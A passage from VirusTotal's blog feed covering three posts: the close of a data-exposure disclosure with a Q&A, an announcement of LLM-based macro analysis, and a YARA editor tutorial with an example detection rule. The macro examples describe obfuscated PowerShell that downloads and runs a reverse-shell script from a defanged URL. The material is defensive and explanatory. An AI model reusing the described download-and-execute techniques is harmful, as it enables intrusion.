unequivocally: This was not the result of a cyber-attack or a vulnerability with VirusTotal. This was a human error, and there were no bad actors involved. </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">This is an example of the data that was included in the CSV file:</span></p><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 468pt;"><colgroup><col></col><col></col><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="background-color: #d9d9d9; border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="background-color: transparent; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">Company Name</span></p></td><td style="background-color: #d9d9d9; border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="background-color: transparent; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">VT Group</span></p></td><td style="background-color: #d9d9d9; border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="background-color: transparent; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">Admin group email address</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-style: italic; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">VirusTotal S.L.</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-style: italic; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">virustotal</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-style: italic; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">User@virustotal.com</span></p></td></tr></tbody></table></div><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">We assure you that the data disclosed was limited strictly to the sort of information provided in the example above. Since this incident, we have implemented new internal processes and technical controls to improve the security and safeguarding of customer data. </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">Trust is the bedrock of our community, and again we apologize for any confusion or concern this may have caused. </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">If you have additional questions or would like to speak with our support team, please reach out to </span><a href="mailto:contact@virustotal.com" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">contact@virustotal.com</span></a><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">Thank you,</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif;"><span style="font-size: 14.6667px; white-space-collapse: preserve;">The VirusTotal Team.</span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif;"><span style="font-size: 14.6667px; white-space-collapse: preserve;"><br /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;"><b><u>Additional Q&A</u></b></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><b>Q: Is my account at risk for hacking because of this incident?</b></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">No, the list only included company names, VirusTotal group tenant names and VirusTotal group administrator emails. The Premium VirusTotal platform is only accessible to partners and corporate clients.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><b>Q: How did VirusTotal become aware of the file's existence?</b></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">This was quickly flagged by our partners and fellow analysts via our support system—we removed the file within an hour of its posting. We deeply appreciate their timely action.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><b>Q: How did these partners and analysts notice this particular file?</b></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">Many of our customers have a</span><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;"> </span><a href="https://support.virustotal.com/hc/en-us/articles/360001315437-Livehunt" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">Livehunt </span></a><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">service based on </span><a href="https://support.virustotal.com/hc/en-us/articles/115002178945-YARA" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">YARA</span></a><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"> rules. This service helps them identify targeted attacks against their organizations, such as phishing. Some of these YARA rules search for files containing their own domains. In this instance, the file matched these rules and the system generated an alert. </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><b>Q: Could a malicious entity or anonymous user have downloaded the file from the VirusTotal platform?</b></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">No. The file was only accessible to our partners and cybersecurity analysts who hold a Premium account with VirusTotal. No anonymous or free account users on VirusTotal had access to the Premium platform. </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><b>Q: Why are files uploaded and scanned on VirusTotal accessible to partners and professional security analysts via the VirusTotal Premium platform?</b></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">The VirusTotal Premium platform facilitates the discovery of new cyber attacks by industry professionals and cybersecurity experts. This shared knowledge enables the analysis of new security threats, leading to updates in security products and an overall improvement in both corporate and worldwide security.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><b>Q: Why was an employee able to download the list in the first place? Has VirusTotal taken any measures as a result of this incident?</b></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">This list of limited customer data was critical to their role. Since this incident, we have implemented new internal processes and technical controls to improve the security and safeguarding of customer data. </span></p><div><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><br /></span></div></span>Emiliano Martinezhttp://www.blogger.com/profile/00741559542946939395noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-56242561664832313852023-07-18T15:32:00.002+02:002023-07-18T17:22:24.821+02:00VirusTotal += Crowdsourced AI<p>We are pleased to announce the launch of Crowdsourced AI, a new initiative from VirusTotal, dedicated to leveraging the power of AI in tandem with community contributions. Spearheading this endeavor, <a href="https://www.hispasec.com/en/" style="color: #1155cc; text-decoration: none;">Hispasec</a> brings to the table an AI solution designed to analyze Microsoft document formats, particularly those containing macros, such as Word, Excel, and PowerPoint files. We extend a warm invitation to all interested parties to join this effort and explore innovative ways to contribute features that will strengthen the cybersecurity community.</p>
<p>About three months ago, we rolled out <a href="https://blog.virustotal.com/2023/04/introducing-virustotal-code-insight.html" style="color: #1155cc; text-decoration: none;">Code Insight</a>, an AI tool geared to help security analysts better understand unfamiliar code snippets with explanations in natural language. In a more recent <a href="https://blog.virustotal.com/2023/05/vt-code-insight-updates-and-q-on.html" style="color: #1155cc; text-decoration: none;">Q&A</a>, we put out a call to anyone keen to lend their own AI models or use cases to VirusTotal to benefit the community. Now, Hispasec has stepped in and added a powerful solution for Microsoft Office documents. They're using a different AI model not only to explain the macros but also to deliver judgements about any potential malicious content, boosting VirusTotal capabilities.</p>
<p>In the words of the company:<br>
<i>“We are incorporating a specialized AI component from our Content Disarm & Reconstruction (CDR) solution, DeepClean, into VirusTotal. This component leverages a Large Language Model (LLM) to interpret and explain the code within macros in specific Microsoft document formats. Additionally, it offers a verdict—based on the model's criteria—on whether the analyzed content can be considered malicious or benign. It’s important to emphasize that this is just one facet of DeepClean. Our broader solution recreates files into clean versions, eliminating executable code while preserving the essential content.”</i></p>
<p>This new integration not only bolsters our AI-driven security analysis but also exemplifies the strength in diversity, mirroring our existing initiatives like Crowdsourced IDS, Sigma, and YARA rules. In line with VirusTotal's mission, we openly welcome various complementary solutions, reaffirming our commitment to a collaborative defense strategy against cyber threats.</p>
<p>Let's dive into a few examples showcasing how this new crowdsourced AI section and the contributions from Hispasec perform and are displayed within VirusTotal.</p>
<p>In the example below, we see the verdict label "malicious" at the beginning of the explanation, emphasized in red for easy visibility. This is followed by a detailed description of how macros within this .XLS file employ various obfuscation techniques. These include base64 encoded strings and the concatenation of variables with diverse names, in an attempt to disguise their behavior. However, the model deobfuscates these measures, revealing the true intent of the macros. It turns out they are attempting to download a script containing a PowerShell reverse shell and subsequently execute it.</p>
<center>
<div class="separator" style="clear: both;"><img alt="" border="0" data-original-height="1076" data-original-width="1875" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLXtuPegFf2Roo6wyEg9Qa88B81SH9VnTyL6okBxCtNfl7IbB1lf0AcWLFlTpE979GweU_SkW7uRW5KxpfAuz50qNNj2kP6JEn94040JVAP1glDz0RZ9J24XNzBSdtOQbwqYvR0HCZ98jJgyEJyJGhsjf3qASKnDXn6jeQSSN69t0b-8DNzNMT827r01k/s1600/Crowdsourced-AI-6.png"/></div><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><a href="https://www.virustotal.com/gui/file/7d86b9e20b3c115afd2f02bd3bfc1eae754a7b4c37d5155990cc3267d67df56e" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">7d86b9e20b3c115afd2f02bd3bfc1eae754a7b4c37d5155990cc3267d67df56e</span></span></a></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 8pt;"></center>
<p>In this other example, the model labels a file as "benign", with the verdict distinctly emphasized in green at the start of the detailed explanation. The report delves into the functionality of the various macros found within the file and their objectives.</p>
<center><div class="separator" style="clear: both;"><img alt="" border="0" data-original-height="1076" data-original-width="1860" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd3K315kwlJqsRea85pvszEC-L2TnPPRJ5uzePED6diRQFJnsEiLYLRpsYv4ssXWpZoZIp7BpU8ncam0vXxz3tcPieWQOhkUNBlzcQrYQv9R5kAu7ydBjgf2rfm88WwlRywQauvE0w1L_ZLIRzigjfZ3vfifeES_nx6ah7g3Nn8A8myDW6mrDRm7Jit_Y/s1600/crowdsourced_ai_2.png"/></div>
<a href="https://www.virustotal.com/gui/file/24f05da105834088c604c0a2bd4987f092ad3d743d86b7200d835a61e490bc28" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">24f05da105834088c604c0a2bd4987f092ad3d743d86b7200d835a61e490bc28</span></span></a></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 8pt;"></center>
<b>Search with Crowdsourced AI results</b><br>
<p>All the data generated by contributors in Crowdsourced AI is indexed and readily accessible via VirusTotal Intelligence. This means that analysts can now utilize this resource to perform targeted searches, streamlining their investigative processes. For a focused search by verdict, simply input "crowdsourced_ai_verdict:" followed by either "malicious" or "benign". If you're looking to search within the explanations provided by the AI, use the "crowdsourced_ai_analysis:" parameter followed by the specific text you're interested in.</p>
<p>To illustrate the practical application of these search parameters, let's walk through a scenario an analyst might encounter. Suppose you have received an alert from your SIEM pointing to the IP address 192.168.45.239. You want to find out if there is any document associated with this particular IP.</p>
<p>The search query <a href="https://www.virustotal.com/gui/search/crowdsourced_ai_analysis%253A192.168.45.239/files" style="text-decoration: none;">"crowdsourced_ai_analysis:192.168.45.239"</a> yields a .DOC file linked with the IP address.</p>
<center><div class="separator" style="clear: both;"><img alt="" border="0" data-original-height="516" data-original-width="1346" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw2ph2Z1Eh51uuqK4VJuft_a7iz62EWMPiWXK2rNpUfHm2oo77doTPqGSvdjNHxnVDhtiAwMN5d97Ncu6aafdfY1atSll8WuUDYBVV9wbBfNodkEL15tOqb26lUfccclLEdXlpjHQGgZlF_1DvAVb0DSi-fC4-E-Xnhz6AeYAC3yoRQiuiY6AJ1XvXloM/s1600/crowdsourced_ai_3.png"/></div></center><br>
<p>Clicking on the search-returned sample, we can read the AI description and find the macro within the .DOC file uses the CreateProcess function to run an obfuscated PowerShell command. Decoding the base64 string reveals that this command downloads and executes a script from 'hxxp://192.168.45.239/run.txt'.</p>
<center><div class="separator" style="clear: both;"><img alt="" border="0" data-original-height="1360" data-original-width="1498" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvckfQw_M3DiP_5V4JTysDOoK1dVZYU7F19cqjOk5pQb4_7i0WcFB7KyX7qvsLKXNQZiQdIWu5uwlAHpyFdSAHkoCEPgDEtRVcBNc6wPT-WEMF4aOzM0mdEK2gMAXqfzY4H8HpHxGJLhiAmfAKKx3cbyHYFeeIJ2ASBq0NLFiVbCdG_BaSP1pHGacDn1E/s1600/crowdsourced_ai_4.png"/></div><a href="https://www.virustotal.com/gui/file/5a1cad5a9e9be128aa4436540450b17b6716cb64711894078435266106870e6a" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">5a1cad5a9e9be128aa4436540450b17b6716cb64711894078435266106870e6a</span></span></a></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 8pt;"></center>
<b>Join Crowdsourced AI</b><br>
<p>At VirusTotal, our commitment to facilitating collaboration within the security community is unwavering. This extends beyond merely integrating AI models and use cases into our platform. We're also more than willing to supply datasets, comprising samples and metadata, to assist in training innovative security solutions.</p>
<p>If you're utilizing an AI model or have identified a potential use case that can enhance our collective security posture, we eagerly invite your contribution. Our goal isn't confined to file and code analysis models; we are open to any use case applicable within the VirusTotal ecosystem. This includes, but is not limited to, solutions addressing status and dynamic analysis explanation, metadata extraction, summarization and evaluation, applications related to domain names, URLs, IP addresses, and tackling various forms of cyber threats such as phishing and other sophisticated attacks.</p>
<p>By broadening our scope and welcoming diverse solutions, we aim to transform VirusTotal into a central hub for superior AI models and use cases across all aspects of the security domain. In doing so, we strengthen our community's defenses and augment our capacity to counter a wide spectrum of cyber threats.</p>
<p>Thank you for being a part of the security community and supporting collective efforts to improve threat detection and response.</p>
Bernardo.Quinterohttp://www.blogger.com/profile/17288490159411812678noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-71482716007388939822023-07-13T11:09:00.003+02:002023-08-04T12:13:54.877+02:00Actionable Threat Intel (III) - Introducing the definitive YARA editor
<div class="interval_12">
One of VirusTotal's biggest strengths is its Hunting capabilities using YARA rules. In addition to matching all files against a big set of crowdsourced YARA rules, it also allows users to create their own detection and classification rules.
</div>
<div class="interval_12">
YARA was originally intended to support file-based rules. VirusTotal's <b><a href="https://support.virustotal.com/hc/en-us/articles/360007088057-Writing-YARA-rules-for-Livehunt" target="_blank">"vt" module</a></b> extended YARA's capabilities with file’s metadata and behavior. This allows our users to create advanced <b><a href="https://www.virustotal.com/gui/hunting/rulesets" target="_blank">Livehunt</a></b> and <b><a href="https://www.virustotal.com/gui/hunting/retrohunt" target="_blank">Retrohunt</a></b> rules and get notified via <b><a href="https://www.virustotal.com/gui/ioc-notifications/all?order=date-" target="_blank">IoC Stream</a></b> every time <u>new</u> or <u>re-scanned</u> files match our rules.
</div>
<div class="interval_12">
Designing good YARA rules requires some level of expertise and time investment. That’s why we have reengineered our built-in YARA editor to make it easier for our users to create, test and deploy rules. In this post we will provide details for all its new capabilities!
</div>
<div class="interval_12">
Other than making YARAs look glorious with <b>full syntax coloring</b> and <b>auto-complete</b>, there is much more this editor offers. But first let’s clarify how to find the new editor.
</div>
<div class="central_img width_80 interval_12">
<img src="https://lh6.googleusercontent.com/ger3Gvf9IpcIUML3AOgQRtG5gxqg_hKyfOvdacbGGjHd03jGgjTINpFdOTmgO35EuqDPihCNmkVucr6UsvgwQrR648WqdqCZOMo1h-S8xH91pg_-h_9WTonhI8ZGIYSiAM1-PUsvzP_goQdotVRa1W64268oA2TXduHBmnH0teU_dmMkP4_Z0fA8QAU7C8ujar8rLTQs3V3MVAPGqZLZ7mmHBVGh5nyFl-ZdKg" />
</div>
<div class="interval_12">
The new YARA editor can be accessed from the <b><a href="https://www.virustotal.com/gui/hunting/rulesets" target="_blank">Livehunt</a></b> or <b><a href="https://www.virustotal.com/gui/hunting/retrohunt" target="_blank">Retrohunt</a></b> dashboards over the <b>Hunting</b> dropdown on the top left menu of the landing page. From the Livehunt dashboard, the <b>“New Livehunt Ruleset”</b> dropdown has 4 options that link you to the YARA editor for the specific entity of your interest.
</div>
<div class="interval_12">
This post will focus on <b>file rules</b> - but stay tuned for future posts detailing all other options.
</div>
<div class="central_img width_40 interval_12">
<img src="https://lh4.googleusercontent.com/1Ey5hGwzeHAaNIubXY7bf6cwQY2oHk44Tup8UcQ5tgGdua_mCWRGak_pkKYUa6zSXUOrH28pO2-8nkuwVHljtD-aje3ivVDMAKuCpbI-MLd1HyR58cCc_qNjmU5SbuPJvxOu9VuK7r5GrKQHFwFu85A6Hfp5fJQWeQo5fsNh2fj1L3n8H-LY94AnYKViBD9mB8oFtUla-FwzNtdj0N3sK-xevrj6J25JdsVn0A" />
</div>
<div class="interval_12">
Ok, now let’s see in more detail all the big new features!
</div>
<br/>
<h2 style="text-align: left;">Feature #1 - YARA rule templates</h2>
<div class="interval_12">
The YARA editor provides you with pre-defined self-descriptive <b>rule templates</b> (<a href="https://developers.virustotal.com/docs/nethunt-examples" target="_blank">here</a> you can find full details). We will keep adding more templates in the future and refreshing existing ones.
</div>
<div class="interval_12">
For instance, let’s say that you are interested in new samples, detected as malicious by AntiVirus engines, and hosted on a certain domain or URL. You can filter out templates available using keywords such as: “URL”, “download” and “positive”, and select the one that fits you better based on its description, as shown in the image below.
</div>
<div class="central_img width_80 interval_12">
<img src="https://lh4.googleusercontent.com/fD67sYM2TRjrODssU1CpwX7am72C7du-cP3vgmiLZJ4BWOkwMmKRTHi2-I77cNLCSA8ryggnz-rfuzCJO2uLgfGUezC6ycxMLCES_zZDWbmAdKD48hsGCy2XInWglGhUXS-9gp_aHNv_eEsReF-Wu05KBrBen9lHGlPc0H2cE1sM0PuLaOV_sQtmR_Ti-p9KxRxj9euoCRh_hjdUyjYDl0R7bQ6cSFFzur6cQw" />
</div>
<div class="interval_12">
Now it’s easier to build your own rules by making use of the suggested templates. You just need to replace the placeholders with your specifics. Additionally, it is very important to rename the predefined rules so you can easily identify the source of the notifications you'll receive in your <a href="https://blog.virustotal.com/2023/06/actionable-threat-intel-ii-ioc-stream.html" target="_blank"><b>IoC Stream</b></a>. In this case, the target URL and the number of detections for new files.
</div>
<div class="interval_12">
We will create a new rule based on these templates, with a few extra details: [1] we want to get PDF files only, [2] check if the file was seen hosted in a given domain, and [3] add a couple of extra domains to check if the file resolved them when executed in any of our sandboxes. Here is the resulting rule:
</div>
<div class="my-code interval_12">
<mark class="orange">import</mark> <mark class="green">"vt"</mark> <br/><br/>
rule malware_hosted_on_strikinglycdn {<br/><br/>
meta:<br/>
description = <mark class="green">"Detects malicious files hosted on strikinglycdn.com domain."</mark><br/>
category = <mark class="green">"MAL"</mark><br/>
examples = <mark class="green">"https://www.virustotal.com/gui/search/p%253A5%252B%2520itw%253Astrikinglycdn.com%2520(behaviour_network%253A%2522oyndr.com%2522%2520or%2520behaviour_network%253A%2522fancli.com%2522)/files"</mark><br/>
creation_date = <mark class="green">"2023-07-11"</mark><br/>
last_modified = <mark class="green">"2023-07-11"</mark><br/><br/>
condition:<br/>
<mark class="gray">// combining existing templates</mark><br/>
vt.<mark class="blue">metadata.analysis_stats.malicious</mark> > <mark class="red">5</mark> and<br/>
vt.<mark class="blue">metadata.new_file</mark> and<br/>
<mark class="gray">// [1] checking filetype</mark><br/>
vt.<mark class="blue">metadata.file_type</mark> == vt.<mark class="blue">FileType.PDF</mark> and<br/>
<mark class="gray">// [2] check if the file was hosted in this domain</mark><br/>
(<br/>
vt.<mark class="blue">metadata.itw.domain.raw</mark> iendswith <mark class="green">".strikinglycdn.com"</mark> or<br/>
vt.<mark class="blue">metadata.itw.domain.raw</mark> == <mark class="green">"strikinglycdn.com"</mark><br/>
) and<br/>
<mark class="gray">// [3] check if it resolves these domains during sandbox detonation</mark><br/>
<mark class="orange">for</mark> any dns_lookup <mark class="orange">in</mark> vt.<mark class="blue">behaviour.dns_lookups</mark> : (<br/>
dns_lookup.<mark class="blue">hostname</mark> == <mark class="green">"oyndr.com"</mark> or<br/>
dns_lookup.<mark class="blue">hostname</mark> == <mark class="green">"fancli.com"</mark> <br/>
) <br/>
}
</div>
<br/>
<h2 style="text-align: left;">Feature #2 - YARA playground</h2>
<div class="interval_12">
When designing a rule it is always very hard to find the right balance between over and under fitting. Is our rule detecting the samples it is based on? How many other samples are being detected by it? Does our rule detect any unintended legitimate samples? Given this is the first thing every security expert would do, we decided to make it easier to test your fresh new rule against a set of IoCs.
</div>
<div class="interval_12">
In the bottom of the editor you will find 3 tabs. In the <b>TEST</b> tab you can add a set of IOCs you want to test your rule against, as shown below.
</div>
<div class="central_img width_50 interval_12">
<img src="https://lh6.googleusercontent.com/KNmta2CoGOsJS6FBw-SxDy6Ld0mfqnh4yW3tJGcrScwtlXQvRiUAoTkLjZx0BHg2vOq1H8eUqymLbiL7drJ1kbJSWszUteeC1jSnNGQyQ4FDJ1ozGOkyjbqFwXLNgd5wyVjXYhw6qEFAvXEG0USSiJfHaEO_RMZa8-riYPpiNpQvo0mhaYx9P2_0th-Gk_6XKp-QNYpnx4WBE0npiI65pgJJwIAr4gL6Rf2W2g" />
</div>
<div class="interval_12">
Then we are ready to <b>Run test</b> and find <b>TEST RESULTS</b> in the next tab, showing how the tested IoCs matched our rule.
</div>
<div class="central_img width_50 interval_12">
<img src="https://lh6.googleusercontent.com/JrVc--Bg_iR1cvA7QI7Bx4EWhR9li3vbtVbx4rJAyrJjP2oXvJBhxNn_gxa1vgF6sl-fEfxELx-sQc4q5NUmZqGaywxSnD6ahR1mvt9QZUehXNt6VYyigQyzqpBZ2b2UV42oSHnsKRFsdrJrh80pmNqGJuHMmMDyql-AN1edDDy7t1xG-UhqaG38KwH9uO2V0eFs5yV5gR8PmgJ0x3m3E8LD4f1FGYyy70QVdw" />
</div>
<div class="interval_12">
If anything happens, the <b>PROBLEMS</b> tab will give you details.
</div>
<div class="interval_12">
Additionally, when working with multiple rulesets in multiple web browser tabs at the same time, the <b>YARA editor</b> displays a
<img class="width_15" src="https://lh4.googleusercontent.com/PSHd6xLCdxIrBgttzGw9S0tIHMetBC5v0TIzpgstJ67m4duZICY1Amxoabcn_gIjijmRIZY65ER3nwFbNJIzT4nBvlgULK1JiRO5LW4EebpdvI8C74YLLLXbq3BtbZ8Mg2e-jlVqFPwhZIHlyougrtL8nB7WH7K1rXlv066zoBeep3WJqFLfgh-01KWqB-Bd8-sVxlqkghJTeLwce7H7L-_LTF1LC1mUeumpCw" />
message on the top right corner to help you to always keep in the spotlight the entity you are targeting with your rules.
</div>
<br/>
<h2 style="text-align: left;">Wrapping up</h2>
<div class="interval_12">
